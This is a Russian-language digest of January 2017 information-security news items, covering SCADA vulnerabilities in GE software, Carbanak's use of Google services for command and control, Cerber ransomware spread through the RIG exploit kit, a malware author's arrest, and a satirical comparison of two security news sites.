    Резидентный очень опасный вирус, поражает .COM-, .EXE- и .SYS-файлы, которые ищет в текущем каталоге при каждом вызове int 21h. .COM- и .EXE-файлы инфицирует стандартно. При заражении .SYS-файлов дописывает свое тело в конец файла и модифицирует программы Interrupt и Strategy заражаемого драйвера.

    Активизируется только при отсутствиии антивирусных блокировщиков. При попытке пройти коды вируса отладчиком уничтожает часть данных на диске. Содержит тексты: «Dear Nina, you make me write this virus; Happy new year!», ":\COMMAND.COM".

    Цитата по книге «Компьютерные вирусы в MS-DOS» Евгения Касперского. 1992 год. Страницa 41.

    Disclaimer: Данная колонка отражает лишь частное мнение ее автора. Оно может совпадать с позицией компании «Лаборатория Касперского», а может и не совпадать. Тут уж как повезет.

    orig: 2017-01-20 18:03:23 / https://habrahabr.ru/post/320060/ (click post title)



    PT помогает General Electric защитить системы водоснабжения и ЛЭП

    Эксперт Positive Technologiesinfo-icon Илья Карпов обнаружил уязвимости в программном обеспечении GE Digital, предназначенном для автоматизации производства в энергетике, водоснабжении, нефтегазовой и пищевой промышленности, автомобилестроении и в других сферах.

    Эксплуатация этих недостатков может привести к нарушению технологических процессов на тысячах предприятиях по всему миру. Уязвимость CVE-2016-9360, получившая оценку 6,4 балла по шкале CVSS v3, позволяет злоумышленнику локально перехватить пароли пользователей при наличии доступа к авторизованной сессии. Слабо защищены пароли пользователей в таких продуктах General Electric, как Proficy HMI/SCADA iFIX 5.8 SIM 13, Proficy HMI/SCADA CIMPLICITY 9.0, Proficy Historian 6.0 и в их предыдущих версиях. 

    Еще одна обнаруженная брешь с оценкой 6.8 по шкале CVSS v3 дает возможность нарушителю или вредоносному приложению, имеющих локальный доступ, с помощью несложных манипуляций заполучить пароли к базам с производственными данными. Этому недостатку защищенности подвержена система iFIX 5.8 (Build 8255) и более ранние сборки. 

    Третья уязвимость, найденная экспертом Positive Technologies (в Proficy Historian Administrator 5.0.195.0), получившая оценку 3.3, позволяет локальному атакующему блокировать работу приложения для авторизации в базе данных реального времени, что может приводить к сбоям при чтении и записи исторической информации и неработоспособности базы данных. 

    Также во всех трех системах исследователем Positive Technologies был обнаружен критический недостаток механизма безопасности, связанный с использованием стандартных паролей для авторизации доступа по сети, что позволяет удаленно получить доступ к управлению производственным процессом. 

    Для устранения указанных уязвимостей необходимо обновить Proficy HMI/SCADA iFIX до версии 5.8 SIM 14, Proficy HMI/SCADA CIMPLICITY — до версии 9.5, а Proficy Historian — до версии 7.0. 

    «Наличие паролей пользователей в открытом виде чревато перехватом контроля над SCADA-системой, — говорит руководитель отдела исследований и аудита промышленных систем управления Positive Technologies Илья Карпов. — Штатно авторизовавшись в системе, атакующий может достаточно глубоко влиять на технологический процесс, что грозит не только экономическими потерями, но и поломкой оборудования, авариями. В случае получения пароля к базам данных, злоумышленник или «зловред» смогут нелегитимно ее модифицировать, что создает опасность возникновения различных нештатных ситуаций и потери исторических данных, без которых трудно расследовать причины аварии или каких-то изменений в системе».

    orig: 2017-01-20 16:02:30 / https://www.anti-malware.ru/news/2017-01-20/21918 (click post title)



    Carbanak использует Google-сервисы для C&C

    Интернациональная группировка Carbanak явно не собирается почивать на лаврах после масштабной и успешной киберкампании против финансовых институтов. Украв порядка $1 млрд из сотни банков, она периодически напоминает о себе, а в последнее время осваивает новую для себя технику управления зловредами и имплантами — посредством сервисов Google.

    Изучая активный эксплойт, распространяемый через спам-письма с вредоносным вложением RTF, исследователи из Forcepoint обнаружили, что его целью является загрузка используемого Carbanak зловреда, который отправляет отчет о заражении на сервер Google. Как оказалось, Carbanak ныне задействует для нужд C&C такие сервисы, как Google Forms и Google Sheets. Это позволяет злоумышленникам прятать свои коммуникации в трафике Google, который вряд ли будет блокироваться в организациях.

    По свидетельству Forcepoint, при каждом заражении в рамках текущей кампании на Google Sheets создаются новая страница и уникальный ID жертвы, позволяющие участникам Carbanak управлять взаимодействием с зараженной машиной. Автор атаки вручную заходит на эту страницу, собирает данные, присланные с компьютера жертвы, и загружает на страницу команды и дополнительное вредоносное ПО, которые затем отдаются на машину жертвы.

    Исследователям не удалось установить число C&C-каналов, открытых Carbanak на сервисах Google, однако сам факт злоупотребления они уже довели до сведения компании. В ответ на запрос Threatpost представитель Google отказался комментировать масштаб проблемы и меры противодействия, лишь подтвердил, что компания знает об абьюзах и работает над их пресечением.

    «Участники Carbanak продолжают искать способы сокрытия своей деятельности и ухода от обнаружения, — пишет Forcepoint в отчете. — Не исключено, что использование Google как независимого C&C-канала окажется более успешным, чем регистрация новых доменов или использование доменов без репутации».

    По словам экспертов, поводом для расследования отчасти послужила новая кампания, о которой сообщалось на безвестном сайте tr1adx. Этот сайт опубликовал четыре небольшие заметки, посвященные в основном деятельности спонсируемых государством групп.

    1 января на tr1adx появилось сообщение о Carbanak-кампании, которую автор записи называет Digital Plagiarist («Цифровой плагиат»). Согласно tr1adx, авторы данной кампании используют вредоносные документы Office, размещая их на «зеркалах» легитимных сайтов, которые принадлежат Американскому управлению по контролю за продуктами питания и лекарственными средствами (FDA), казначейству США, Zyna, Atlantis Bahamas, Waldorf Astoria и другим легитимным организациям, работающим в сфере промышленного производства, массмедиа, гостиничном бизнесе или системе здравоохранения. Инициатором киберкампании, которого tr1adx именует TelePort Crew, скорее всего, является Carbanak, судя по используемым доменам и вредоносным программам — они аналогичны выявленным Trustwave в ходе прошлогодних атак Carbanak против владельцев отелей и предприятий общепита.

    Эксперты Forcepoint изучили RTF-файл с вредоносным VBScript, ранее использовавшийся лишь в атаках Carbanak. Как оказалось, в этот документ внедрен объект OLE, замаскированный под изображение, на которое предлагается кликнуть, чтобы посмотреть вложение. Если пользователь последует этой инструкции, отработает VBScript и откроется диалоговое окно с предложением открыть файл, который и грузит целевого зловреда.

    «Мы расшифровали скрипт и обнаружили типовые признаки вредоносного VBScript, используемого группой Carbanak, — рассказывают исследователи. — Вместе с тем мы обнаружили в основном файле VBScript новый скриптовый модуль ggldr, закодированный по base64, и другие VBScript-модули разного назначения, используемые данным зловредом. Анализ скрипта показал, что он способен использовать сервисы Google в качестве C&C-канала».

    Деятельность Carbanak раскрыла в 2015 году «Лаборатория Касперского», опубликовав отчет о масштабной киберкампании, в ходе которой около сотни банков из 30 стран потеряли от $2,5 млн до $10 млн в каждом случае целевой фишинговой атаки.

    orig: 2017-01-20 15:50:09 / https://threatpost.ru/carbanak-using-google-services-for-command-and-control/20190/ (click post title)



    Решение ЛК для защиты от целевых атак получило сертификат ICSA Labs

    Продукт «Лаборатории Касперского» Kaspersky Anti Targeted Attack Platform успешно прошел квалификационное тестирование независимой лаборатории ICSA Labs в категории защиты от целенаправленных атак и передовых угроз (ATD, Advanced Threat Defense).

    Тестирование представляло собой симуляцию реальной среды и длилось 33 дня. За это время на серверы, защищенные Kaspersky Anti Targeted Attack Platform, было проведено 550 атак вперемешку с 377 «чистыми семплами» — это объекты, которые содержат в себе подозрительную активность, но не относятся к вредоносным (например, программа, которая делает снимки экрана, но не использует их в злонамеренных целях).

    По результатам теста решение Kaspersky Anti Targeted Attack Platform обнаружило 99,44% атак, пропустив всего три объекта и показав минимальный уровень ложных срабатываний — 0,265% (один случай).

    Эксперты ICSA Labs отметили, что 99,44% — впечатляющий уровень обнаружения, значительно превышающий порог сертификации в этом году. Все угрозы на момент тестирования были новыми или малоизученными, при этом 97% обнаруженных решением «Лаборатории Касперского» зловредов существовали не более одного часа (zero-hour).

    «ICSA Labs — один из лидеров среди независимых компаний-тестеров, и для нас очень важно получение этого сертификата, — комментирует Олег Глебов, руководитель направления развития решений по противодействию целенаправленным атакам «Лаборатории Касперского». — Особенно здорово, что уровень защиты измеряется не “точечно” в определенный момент времени, а в течение длительного периода: таким образом тест показывает эффективность решения максимально приближенно к реальным требованиям заказчиков».

    orig: 2017-01-20 15:14:12 / https://www.anti-malware.ru/news/2017-01-20/21917 (click post title)



    Versus battle: Anti-Malware — SecurityLab

    Когда я думал о формате версуса, я планировал сделать два пилотных выпуска. И это – второй из них, который был задуман еще в прошлом году, но реализация подкачала. Не смотря то, что мне версусы нравятся, готовить их крайне трудозатратно. Что бы подготовить первый – ушло 2 недели. Пока придумаешь раунды, пока найдешь материал, пока пересмотришь раунды, потом еще картинок надо наделать…

    Посему, теперь буду писать версусы – лишь по заказу моих любимых читателей. Если хотите, что-то сравнить – пишите.

    Необходимое пояснение

    Уважаемые редакции и редакторы, цель материала не в том, что бы вас обидеть. Я не знаю никого из вас лично, и смотрю со стороны. Цель материала показать то, что видит ваш рядовой читатель. Смысл в том, чтобы эти неточности не мешали вам работать и нести просвещение безопасникам. Я надеюсь, вы воспримите данный материал как взрослые люди.

    Все ниже сказанное – личное мнение автора, выраженное в пародийной манере. Автор – шут, что с него возьмешь?

     

    Данный версус родился из осознания, что все печально у нас со СМИ. 2 сайта, 3 блога и десяток аккаунтов в соцсетях не утолят информационный голод безопасника. Поэтому сегодня бьются самые раскрученные информационные сайты по информационной безопасности.

     

    Очень сложно знакомиться с сайтом, это не человек, не продукт, не средство защиты. Т.к. моя психика застряла на подростковом уровне (у этого и диагноз есть – синестезия, называется), я буду ассоциировать сайты с личностями их главных редакторов или руководителей.

    Но начнем с внешнего вида.

    Anti-malware – Илья Шабанов

    Вот, как Илья отрекомендовал себя в разделе Наша команда.

    Сразу бросается в глаза, что Илья человек разносторонний, знает все от А до Я.

    Так же, Илья является Microsoft Most Valuable Professional in Windows Security, правда проверить эту информацию не удалось. Среди отечественных MVP Илья не обнаружился.

    Илья активный участник поИБэ тусовки, а также соцсетей. Можно с уверенностью сказать, что он входит в топ-10 по мельканию в поибешном пространстве.

    SecurityLab – Александр Антипов

    Про Александра, можно узнать лишь то, что он главный на секлабе по всем вопросам :) Если специально не искать, об Александре трудно найти дополнительную информацию. Во многих сферах, малая публичность говорит о достойном уровне профессионализма (управление СМИ в данном случае). Думаю, это как раз тот случай.

    Раунд известности выигрывает Илья.

     

    Anti-malware – Независимый ресурс

    Anti-malware – это вещь для зарабатывания денег. Любая независимая деятельность, должна себя кормить, хотя бы хлебом.

    Основатель сам не скрывает, что цель проекта, что бы вы сделали правильный выбор. Для тех, кому надо.

    Главная страница встречает нас рекламными баннерами, где под заголовком «Продукт месяца» висит ссылка на сайт StaffCop.

    Невинное введение в заблуждение за 0,1 доллара за клик. Девушка — Саша Грей????

    Так же есть новости, немного аналитики и блоги. Новости выходят довольно редко (2 за сегодня, против 7 на секлабе).

    К вопросу об обновлении… да и обзоры странно расположены по датам.

    Аналитика по рынку представлена странным набором отчетов представляющих собой:

    Итого 26 аналитических отчетов за 12 лет работы, или по 2 отчета в год… маловато.

    В тестах опять полно антивирусов… кстати, а чем вызваны временные разрывы между тестами…?

    В целом сайт представляет собой наспех собранную солянку. Очень много заказных и проплаченных матриалов. Помниться Андрей Прозоров спрашивал меня, после публикация «тестирования» Дозора на Anti-malware, почему я уверен, что Александр Панасенко (автор тестирования) не сидел за системой больше 4 часов. Ответ прост – «космический интерфейс» Дозора режет глаза при постоянной экслуатации. Он хорош для демо-стенда, но потом рябит в глазах. Мнение Александра Панасенко курирующего маркетолога Solar об интерфейсе можно прочитать в статье.

    А общая запущенность сайта, совсем убивает впечатление. Такое ощущение, что тут пара фрилансеров выпускают статьи под своими именами и Илья, остальные до кучи.

    Эх, Олеся, Олеся :)

    SecurityLab – Корпоративный ресурс

    В свое время я часто сидел на секлабе, еще старого дизайна. Секлаб – сейчас под крылом Позитивов (а мб и всегда был), что позволяет читателям не потреблять тонны рекламы и сконцентрироваться на контенте.

    Хотя бы без рекламы…

    Основные фишки: новости, уязвимости, статьи, блоги (агрегатор).

    Можно даже коллекцию поибешного софта скачать, что не может не радовать. А, вот, заброшенный форум можно было бы и удалить.

    Коллекция софта

    Раунд контента выигрывает SecurityLab.

     

    Надо сказать, что у обоих ресурсов был со мной конфликт. С Секлабом получилась следующая история. Стал я изучать сайт. Смотрю, несколько разделов не обновлялись по пару лет, но ссылки на них до сих пор висят на главной (например, Конкурсы, Мнения, да и софта полно старого). Пикировка с Александорм, закончилась со счетом 1-1: а) не все разделы во вкладке Статьи не обновляются, б) проблема с обновлением есть. После чего разошлись по своим делам.

    Тот самый раздел

    С Anti-malware все было по-другому. Сайт вывесил интервью с Игорем Ляпуновым, зашел я почитать с телефона и не могу понять… выдает текст по DLP МФИ-Софта… при том, что реклама вылезает еще до названия статьи… Разумеется, что я бы на месте МФИ-Софта потребовался бы деньги назад с Ильи, т.к. рекламу все же надо таргетировать, а не пускать везде подряд одну и ту же. И странно, что Игорь Ляпунов, все еще сотрудничает с малваре. Им понимаешь, деньги платят, а они засирают целевые посты рекламой конкурентов.

    Та самая статья, но реклама уже другая

    Все это, я мягко сказал Илье, а что получил кучу хайпа и угрозу забанить меня, если еще раз такое повториться. Разумеется, я не стал ждать неизбежного и расфрендился.

     

    Итого: с футбольным счетом 2-1 побеждает SecurityLab.

    P.S. Хотите еще версусов? Пишите темы.

    P.S.S. Прием вопросов оканчивается в воскресенье, уже 7 штук.

    orig: 2017-01-20 13:17:00 / http://ddudko.ru/fareplace7/ (click post title)



    Китайское приложение Meitu уличили в сборе персональных данных

    Приложение собирает «странную» информацию, которая необязательна для его работы.

    Специалисты по кибербезопасности заподозрили популярный китайский мобильный редактор Meitu в сборе персональных данных пользователей, а его разработчика - в торговле информацией, сообщает Wired.

    Помимо разрешения на использование стандартных для фоторедактора функций: камеры, памяти телефона и интернет-подключения, приложение получает доступ к информации о других запущенных программах, местоположении, данным о звонках и идентификаторе устройства, сведениям о Wi-Fi- подключении, истории устройства и приложений и пр. Версия Meitu для iOS проверяет, услугами какого мобильного оператора пользуется владелец устройства, а также подвергалась ли операционная система взлому.

    «Многие приложения собирают информацию, однако их производителями являются хорошо известные компании, которым мы уже доверяли наши данные. Meitu - иностранная компания и они собирают очень странные данные, которые не обязательно нужны для работы приложения», - отметил эксперт компании Vectra Networks Грег Линарес (Greg Linares).

    Специалист в области кибербезопасности Джонатан Здзиарски (Jonathan Zdziarski) согласен с коллегой. По его словам, код приложения - по большей части «просто мусор». Специалист также обратил внимание на большое количество разнообразной встроенной аналитики и модулей для отслеживания рекламы.

    «Я насчитал как минимум полдюжины таких модулей. Обычно вам не нужно столько, если вы не торгуете информацией», - говорит Здзиарски.

    orig: 2017-01-20 12:06:07 / http://www.securitylab.ru/news/485088.php (click post title)



    Главными врагами безопасности IoT являются разработчики

    По словам ИБ-эксперта, при создании устройств разработчики не учитывают поведение простых пользователей.

    Ботнет Mirai является только вершиной айсберга в вопросе безопасности «Интернета вещей» (IoT). Такое мнение выразили ИБ-эксперты на конференции linux.conf.au, проходящей 17-20 января в австралийском городе Хобарт.

    Как отметил разработчик встроенных систем Кристофер Биггс (Christopher Biggs), использование ботнета Mirai для осуществления масштабных DDoS-атак отвлекло внимание от других угроз, представляемых незащищенными IoT-устройствами. По словам эксперта, помимо прочего, киберпреступники могут использовать взломанные видеокамеры или видеорегистраторы с целью слежения за жертвой или шантажа. С помощью скомпрометированных IoT-устройств злоумышленники могут собрать большой объем данных о жертве.

    «Может показаться забавным, если кому-то удастся использовать автономные компьютеры для получения бесплатной еды или бензина. Однако что вы скажете, если ваши светильники вдруг начнут мигать каждые 200 миллисекунд и перестанут только тогда, когда вы заплатите преступнику выкуп в биткойнах?», - отметил Биггс.

    Как отметил эксперт, межсетевые экраны бессильны перед подобной угрозой, поскольку блокируют только входящий трафик. Если UPnP не был отключен, то IoT-устройство может открывать любой порт.

    «Вы берете в дом или офис устройство, над которым не имеете никакой власти. Вы не подозреваете, какую угрозу оно может представлять, и не можете устанавливать обновления ПО», - заявил еще один участник конференции, Том Истмэн (Tom Eastman).

    По мнению Биггса, главная ответственность за незащищенность IoT-устройств лежит на разработчиках, которые при создании встроенных систем не принимают во внимание поведение обычных пользователей. «В большинстве случаев на устройствах отсутствует информация о его модели. Если она уязвима, вам наверняка об этом неизвестно. Даже если известно, то, скорее всего, патча нет, а если вы пожалуетесь, то наверняка всем наплевать», - цитирует Биггса издание The Register.

    По словам эксперта, разработчики используют Linux, не задумываясь о безопасности. Проще установить полную версию ОС, чем напрячься и уменьшить возможности для атак. В некоторых случаях лучше и вовсе вместо Linux использовать более простые ОС. 

    orig: 2017-01-20 11:55:56 / http://www.securitylab.ru/news/485086.php (click post title)



    Россияне все еще не научились грамотно пользоваться паролями

    Только 35% россиян создают отдельную комбинацию логин\пароль для каждой учетной записи.

    Каждый шестой интернет-пользователь в России сталкивался с попыткой компрометации учетной записи, показало исследование, проведенное «Лабораторией Касперского».

    По данным опроса, только 35% россиян создают отдельную комбинацию логин\пароль для каждой учетной записи, большая часть респондентов предпочитают использовать одни и те же учетные данные для нескольких аккаунтов. 8% опрошенных устанавливают одинаковые логины и пароли во всех своих учетных записях.

    Также выяснилось, что жители РФ не уделяют должного внимания устойчивости пароля. К примеру, всего 30% участников опроса отметили, что комбинируют заглавные и прописные буквы, а небуквенные и нецифровые символы используют только 23% респондентов. Примечательно, что значительное число пользователей признают необходимость сильных паролей для защиты своих ключевых учетных записей в системах интернет-банкинга (50%), социальных сетях (34%) и личных кабинетов в online-магазинах (31%).

    Россияне по-прежнему небрежно обращаются со своими паролями. 30% опрошенных раскрывало пароли членам семьи, 9% - друзьям, а более трети респондентов записывают коды доступа на бумаге.

    Как пояснил руководитель потребительского бизнеса «Лаборатории Касперского» Андрей Мохоля, действительно надежный пароль должен быть длинным, содержать много букв разного регистра, цифры и другие символы.

    Согласно данным исследования компании Keeper Security, в 2016 году список самых распространенных паролей практически не изменился по сравнению с прошлыми годами - наиболее популярными у пользователей продолжают оставаться 123456 и 123456789.

    orig: 2017-01-20 10:59:38 / http://www.securitylab.ru/news/485085.php (click post title)



    Опыт внедрения Application Whitelisting на предприятии на базе Microsoft SRP

    3 февраля Петр Губаревич проведет вебинар "Опыт внедрения Application Whitelisting на предприятии на базе Microsoft SRP".

    3 февраля в 10 утра по Московскому времени (GMT+3) Петр Губаревич проведет вебинар "Опыт внедрения Application Whitelisting на предприятии на базе Microsoft SRP".

    Регистрация открыта

    "Белые списки" программ (Application Whitelisting, AWL) являются эффективным методом предотвращения вирусного заражения, в первую очередь вирусов-шифровальщиков, а также блокировки нежелательных программ.

    Многие организации считают внедрение "белых списков" достаточно сложным мероприятием. Ознакомьтесь с опытом внедрения и поддержки AWL на примере политик ограничения программ (Software Restriction Policies, SRP), что поможет вам применить эту технологию с гораздо меньшими усилиями.

    Петр Губаревич - Microsoft MVP из Латвии, преподаватель Certified Ethical Hacker (CEH), Microsoft Security Trusted Advisor.

    Ведет вебинар Денис Батранков, сотрудник компании Palo Alto Networks, СISSP, CNSE, Microsoft MVP.

    О чем пойдет речь:

  • Базовое ознакомление с технологией.

  • Конфигурация SRP для одного компьютера.

  • Методика внедрения технологии AWL для всего предприятия.

  • Тонкости внедрения.

  • Ориентировочная длительность вебинара: полтора часа. Просьба подключаться заранее, чтобы установить необходимое для участия приложение Zoom.

    В прошлом году многие просили повторить это выступление. Мероприятие поддержано порталом и экспертами SecurityLab.ru.

    Страница регистрации: https://goo.gl/u81NGE

    orig: 2017-01-20 10:00:16 / http://www.securitylab.ru/news/485083.php (click post title)



    Гражданин РФ арестован в Испании за создание вредоноса NeverQuest

    Вредоносное ПО NeverQuest причинило ущерб на несколько миллионов долларов.

    Сотрудники правоохранительных органов Испании арестовали в Барселоне 32-летнего российского программиста за создание вредоносного ПО, предназначенного для похищения банковских данных. Об этом в пятницу, 20 января, сообщает информагентство Reuters со ссылкой на пресс-службу испанской полиции.

    Как ранее сообщал SecurityLab, житель Таганрога Станислав Лисов был арестован 13 января и все это время находился в тюрьме Brians в Мартореле (Испания). Программист подозревается в том, что является главой преступной сети, занимающейся мошенничеством в финансовой сфере. В США был выдан международный ордер на арест Лисова, и в рамках сотрудничества с ФБР испанская полиция арестовала его в аэропорту при попытке улететь в другую европейскую страну.

    Власти США уже два года охотятся на Лисова за создание вируса NeverQuest, способного распространяться через соцсети и электронные письма и причинившего ущерб на несколько миллионов долларов. В ходе анализа подконтрольных Лисову серверов во Франции и Германии правоохранители обнаружили похищенные у банков данные, в том числе о балансах счетов. На одном из серверов также хранились файлы с учетными данными миллионов клиентов банков.

    Лисов будет находиться под стражей, пока верховный суд Испании не решит вопрос о его экстрадиции в США. По словам представителя испанской полиции, запрос на экстрадицию от американских властей уже получен.

    orig: 2017-01-20 09:57:58 / http://www.securitylab.ru/news/485084.php (click post title)



    Место генерального директора в компании ABBYY займет Ульф Перссон

    Генеральным директором ABBYY станет Ульф Перссон, до этого занимавший пост председателя совета директоров

    orig: 2017-01-20 09:52:58 / http://www.jetinfo.ru/news/?nid=3b1e15964208689798234a89e2fc33ab (click post title)



    Встреча Сообщества IT Pro 25 января

    itpro
    Приходите на первую в 2017 году встречу Сообщества IT Pro, на которой мы продолжим рассмотрение новых функций Windows Server 2016. Мы будем обсуждать контейнеры как одно из наиболее значительных нововведений в Windows Server 2016, рассмотрим Docker и практические примеры использования контейнеров.

    А еще мы поговорим, по сути, о революции, которая уже незаметно началась. В Windows Server 2016 появилась поддержка модулей оперативной памяти NVDIMM-N, которые сохраняют содержимое при отключении питания. Мы рассмотрим, какие перспективы это открывает, и к каким изменениям в стандартном ПО это может привести.

    Запланированы два доклада:

  • Windows Server Containers как подмножество нововведений Windows Server 2016
    Спикер: Евгений Григоренко, технический евангелист, Microsoft Россия
  • Windows Server 2016: эволюция или революция?
    Спикер: Михаил Комаров, MVP — Cloud and Datacenter Management
  • Встреча будет проходить в Технологическом центре Microsoft (MTC) в Москве, расположенном около станции метро Белорусская, с 19 до 21 часа. Регистрация на мероприятие строго обязательна. У вас будет возможность выбрать при регистрации вариант посещения мероприятия или online-участие. О том, как подключиться к трансляции, вы будете проинформированы в письме, подтверждающем вашу регистрацию. Для прохода в MTC необходим паспорт или заменяющий его документ.

    Адрес MTC: Москва, ул. Лесная, дом 9.

    orig: 2017-01-20 09:48:50 / https://blogs.technet.microsoft.com/rutechnews/2017/01/20/25-jun-it-pro-meetup/ (click post title)



    Новая вредоносная кампания распространяет вымогатель Cerber

    Новая вредоносная кампания использует набор эксплоитов RIG, ориентированный на устаревшие версии популярных приложений, таких как Flash, Internet Explorer или Microsoftinfo-icon Edge, для распространения вымогателя Cerber. Об этом сообщают эксперты Heimdal Security.

    Кампания использует множество вредоносных доменов для осуществления атаки drive-by и ищет устаревшие, уязвимые версии приложений. Таким образом, пользователи, использующие устаревшие версии браузеров или уязвимые плагины, скорее всего, будут заражены вредоносной программой.

    В рамках этой атаки, злоумышленники компрометируют сайты и внедряют вредоносные скрипты, которые даже не требуют взаимодействия с пользователем для успешного инфицирования. Хакеры ориентируются только на устаревшие версии Flash Player, Silverlight, Internet Explorer и Microsoft Edge, сообщает Heimdal Security.

    Согласно Heimdal Security, набор эксплоитов RIG пытается использовать одну из следующих восьми уязвимостей: CVE-2015-8651 (CVSS-рейтинг: 9.1), CVE-2015-5122 (CVSS-рейтинг: 10, затрагивает почти 100 версий Flash), CVE-2016-4117 (CVSS-рейтинг: 10), CVE-2016-1019 (CVSS-рейтинг: 10), CVE-2016-7200 и CVE-2016-7201 (CVSS-рейтинг: 7.6, затрагивает Microsoft Edge), CVE-2016-3298 (CVSS-рейтинг: 3.6, затрагивает Internet Explorer версий 9, 10, 11) и CVE-2016-0034 (CVSS-рейтинг: 9.3).

    После того, как набору эксплоитов удается найти и использовать уязвимость на компьютере, он приступает к загрузке и установке вымогателя Cerber, одного из самых популярных вредоносов прошлого года. Cerber шифрует файлы пользователя и требует выкуп за ключ расшифровки.

    По мнению исследователей Heimdal Security, у пользователей есть только один выход, чтобы обезопасить себя от этой угрозы – держать программное обеспечение в актуальном состоянии, регулярно обновляя его.

    orig: 2017-01-20 09:38:28 / https://www.anti-malware.ru/news/2017-01-20/21914 (click post title)



    Сбербанк запустит документооборот на основе технологий blockchain

    Сбербанк планирует в первом квартале запустить систему электронного документооборота на основе технологий blockchain

    orig: 2017-01-20 09:34:53 / http://www.jetinfo.ru/news/?nid=d510c448e23ddfbcf78e25d258084ea3 (click post title)



    Machine learning versus spam

    no-image

    Machine learning methods are often presented by developers of security solutions as a silver bullet, or a magic catch-all technology that will protect users from a huge range of threats. But just how justified are these claims? Unless explanations are provided as to where and how exactly these technologies are used, these assertions appear to be little more than a marketing ploy.

    For many years, machine learning technology has been a working component of Kaspersky Lab’s security products, and our firm belief is that they must not be seen as a super technology capable of combating all threats. Yes, they are a highly effective protection tool, but just one tool among many. My colleague Alexey Malanov even made the point of writing an article on the Myths about machine learning in cybersecurity.

    At Kaspersky Lab, machine learning can be found in a number of different areas, especially when dealing with the interesting task of spam detection. This particular task is in fact much more challenging than it appears to be at first glance. A spam filter’s job is not only to detect and filter out all messages with undesired content but, more importantly, it has to ensure all legitimate messages are delivered to the recipient. In other words, type I errors, or so-called false positives, need to be kept to a minimum.

    Another aspect that should not be forgotten is that the spam detection system needs to respond quickly. It must work pretty much instantaneously; otherwise, it will hinder the normal exchange of email traffic.

    A graphic representation can be provided in a project management triangle, only in our case the three corners represent speed, absence of false positives, and the quality of spam detection; no compromise is possible on any of these three. If we were to go to extremes, for example, spam could be filtered manually – this would provide 100% effectiveness, but minimal speed. In another extreme case, very rigid rules could be imposed, so no email messages whatsoever would pass – the recipient would receive no spam and no legitimate messages. Yet another approach would be to filter out only known spam; in that case, some spam messages would still reach the recipient. To find the right balance inside the triangle, we use machine learning technologies, part of which is an algorithm enabling the classifier to pass prompt and error-free verdicts for every email message.

    How is this algorithm built? Obviously, it requires data as input. However, before data is fed into the classifier, is must be cleansed of any ‘noise’, which is yet another problem that needs to be solved. The greatest challenge about spam filtration is that different people may have different criteria for deciding which messages are valid, and which are spam. One user may see sales promotion messages as outright spam, while another may consider them potentially useful. A message of this kind creates noise and thus complicates the process of building a quality machine learning algorithm. Using the language of statistics, there may be so-called outlier values in the dataset, i.e., values that are dramatically different from the rest of the data. To address this problem, we implemented automatic outlier filtration, based on the Isolation Forest algorithm customized for this purpose. Naturally, this removes only some of the noise data, but has already made life much easier for our algorithms.

    After this, we obtain data that is practically ‘clean’. The next task is to convert the data into a format that the classifier can understand, i.e., into a set of identifiers, or features. Three of the main types of features used in our classifier are:

    All these features and their combinations will help us in the final stage – the launch of the classifier.

    What we eventually want to see is a system that produces a minimum of false positives, works fast and achieves its principal aim – filtering out spam. To do this, we build a complex of classifiers, and it is unique for each set of features. For example, the best results for expert features were demonstrated by gradient boosting – the sequential building up of a composition of machine learning algorithms, in which each subsequent algorithm aims to compensate for the shortcomings of all previous algorithms. Unsurprisingly, boosting has demonstrated good results in solving a broad range of problems involving numerical and category features. As a result, the verdicts of all classifiers are integrated, and the system produces a final verdict.

    Our technologies also take into account potential problems such as over-training, i.e., a situation when an algorithm works well with a training data sample, but is ineffective with a test sample. To preclude this sort of problem from occurring, the parameters of classification algorithms are selected automatically, with the help of a Random Search algorithm.

    This is a general overview of how we use machine learning to combat spam. To see how effective this method is, it is best to view the results of independent testing.

    orig: 2017-01-20 08:55:11 / https://securelist.com/blog/opinions/77133/machine-learning-versus-spam/ (click post title)



    Check Point присоединился к глобальному проекту No More Ransom

    Check Pointinfo-icon стал партнером международного проекта No More Ransom — совместной инициативы правоохранительных агентств и компаний частного сектора против распространения вымогательского ПО. Check Point является членом консультационного совета по интернет-безопасности центра по борьбе с киберпреступностью Европола (Cybercrime Center Internet Security Advisory Board).

    Среди участников проекта правоохранительные агентства из 22 стран Европы, Европейская комиссия и компании, специализирующиеся в области кибербезопасности. 

    На портале nomoreransom.org пользователи могут найти подробную информацию о том, как им защититься от программ-вымогателей, а также о наборе бесплатных инструментов, которые помогут им разблокировать устройства и без выкупа расшифровать данные, подвергшиеся атаке различных вариантов вымогательского ПО. 

    В рамках деятельности против ransomware Check Point также объявил о своем сотрудничестве с Европолом, полицейским агентством Европейского союза, чтобы предоставлять организациям и индивидуальным пользователям необходимую информацию об этой растущей угрозе. Check Point и Европол опубликовали совместный отчет о программах-вымогателях «Ransomware: What You Need to Know», в котором показана стремительная эволюция ransomware от ранних вариантов типа Cryptolocker 2013 года, до современных резонансных угроз семейств Locky, CryptXXX, TorrentLocker, Jigsaw и Cerber. 

    В отчете описываются конкретные методы атак для программ из каждого семейства, а также доступные инструменты дешифровки, которые помогут подвергшимся нападению компаниям и владельцам ПК разблокировать свои данные. Он также дает подробные практические рекомендации, которые позволят предотвратить заражение компьютеров программами-вымогателями, а также инструкции о том, как реагировать на атаку и устранить ее последствия. 

    Василий Дягилев, глава представительства Check Point Software Technologies в России и СНГ, комментирует: «Тесное сотрудничество между ИБ-компаниями и международными правоохранительными агентствами критически важно в борьбе с ransomware — оно поможет смягчить последствия крупномасштабных атак. В рамках проекта No More Ransom и сотрудничества с Европолом Check Point помогает разрабатывать новые решения для нейтрализации программ-вымогателей, передавая свой опыт работы и техническую компетенцию в сфере кибербезопасности». 

    orig: 2017-01-20 08:53:07 / https://www.anti-malware.ru/news/2017-01-20/21913 (click post title)



    Check Point Software Technologies присоединился к глобальному проекту No More Ransom против кибервымогателей

    Check Point является членом консультационного совета по интернет-безопасности центра по борьбе с киберпреступностью Европола (Cybercrime Center Internet Security Advisory Board). Среди участников проекта правоохранительные агентства из 22 стран Европы, Европейская комиссия и компании, специализирующиеся в области кибербезопасности.

    На портале www.nomoreransom.org пользователи могут найти подробную информацию о том, как им защититься от программ-вымогателей, а также о наборе бесплатных инструментов, которые помогут им разблокировать устройства и без выкупа расшифровать данные, подвергшиеся атаке различных вариантов вымогательского ПО.

